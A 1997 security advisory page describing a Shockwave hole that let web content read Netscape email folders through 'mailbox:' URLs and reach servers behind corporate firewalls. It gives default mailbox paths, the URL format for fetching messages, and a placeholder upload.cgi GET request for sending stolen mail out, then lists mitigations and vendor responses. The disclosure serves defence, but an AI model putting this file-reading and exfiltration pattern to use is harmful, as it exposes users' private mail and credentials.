SHOCKWAVE SECURITY ALERT

AKA :: How to use Shockwave to read people's Netscape email! 10-Mar-97 --- reported by: David de Vitry

What is this about?

This is about a security hole in Shockwave that allows malicious webpage developers to create a Shockwave movie that will read through a user's emails, and potentially upload them to a server. All without the user knowing about it. In addition, there is a risk to internal Web servers behind corporate firewalls, regardless of the browser you use (Netscape or Internet Explorer), as long as you have the current release of Shockwave.

Who could be affected?

Users of Netscape 3.0 (and 2.0?) on Win 95 / NT/ Mac with Shockwave installed. In addition, the user must not have upgraded to "Communicator", (this just changes the directory structure) and must use the Netscape browser to read their email. There may be other browsers / platfroms affected by similar insecurities with Shockwave

How is this done?

A developer can use Shockwave to access the user's Netscape email folders. This is done assuming the name and path to the mailbox on the users hard drive. For example names such as: Inbox, Outbox, Sent and Trash are all default names for mail folders. The default path to the "Inbox" on Win 95/NT would be: "C:/Program Files/Netscape/Navigator/Mail/Inbox". Then the developer can use the Shockwave command "GETNETTEXT" to call Navigator to query the email folder for an email message. The results of this call can then be feed into a variable, and later processed and sent to a server. To access a message, for example, the first message in a users Inbox, would be called using the following location: For Windows: mailbox:C:/Program Files/Netscape/Navigator/Mail/Inbox?number=0 For MacOS (thanks Jeremy Traub) mailbox:/Macintosh%20HD/System%20Folder/Preferences/Netscape%20%C 4/Mail/Inbox?number=0 Note: if these links all give you an error (such as folder no longer exists), then you might not have anything to worry about. However, if you see an email message in a pop up window, and you have Shockwave installed, then you are vulnerable to this security hole. Show Me an example! Here it is, a Shockwave movie that will read your email. This will not work for everyone, it is currently only setup to work with Win95 / NT, but it could be extended to identify the browser (Jeremy Traub).

Interesting, but what is the security hole?

It doesn't stop at just the first messages of your inbox. A shockwave program could increment through a users entire inbox, outbox, sent, and trash email folder. This information could then be sent back to a server (using a the GET method with a simple cgi program. i.e. http://www...com/upload.cgi?data=This_could_be_your_email_content_ here), all with out the user ever noticing. Here are just a few types of information that a malicious developer could obtain using this hole: + Your name and email + Your friends names and emails + User id's and passwords sent to you in email, and where and how to use them. + Personal email messages that you sent or received using Netscape The "GETNETTEXT" command also has other problems in that it can access other http servers, including ones that are not on the internet, ie, ones that are behind a corporate firewall. That is if the movie is run from behind the firewall. This may be even a bigger problem then the email one, however it affects only corporate users.

Help: What can I do to protect myself?

There are a number of things that you could do to protect yourself from malicious shockwave movies: + Change the path to your mail folders + Don't use Netscape to read or send email + DeInstall Shockwave + Don't go to potentially hostile sites. What are people saying? -- please inform me of any other articles. * Wired article * Macromedia and Netscape have given me no official statements. However, they are both in communication with me regarding this issue. Macromedia did say that their newest product "Shockwave 6," currently in pre-release, does fix this problem. * Microsoft did not want to talk with me about the issue, even though there are risks to their users. They just blew me off saying "There are obviously plenty of security bugs to go around." Followed by, "Great, we're checking it out now." For more information see: http://www.webcomics.com/shockwave/


<webmaster@mtiweb.com>
Last modified